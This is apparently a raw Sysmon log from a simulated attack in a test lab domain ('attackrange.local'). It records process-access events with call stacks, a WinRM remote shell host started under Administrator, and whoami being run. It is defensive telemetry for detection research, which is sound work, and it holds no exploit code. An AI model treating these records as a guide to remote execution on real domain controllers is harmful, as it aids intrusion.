13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.944{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8575-5FCF-22B3-050000000000}0x5b3220HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.924{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8575-5FCF-8400-000000009101}4576C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.924{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8575-5FCF-8400-000000009101}4576C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.924{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8575-5FCF-8400-000000009101}4576C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.924{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.893{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.893{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.893{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.486{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.486{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.486{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.486{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.486{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.486{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8576-5FCF-8A00-000000009101}48404860C:\Windows\system32\conhost.exe{10ACEC4A-8576-5FCF-8D00-000000009101}5016C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 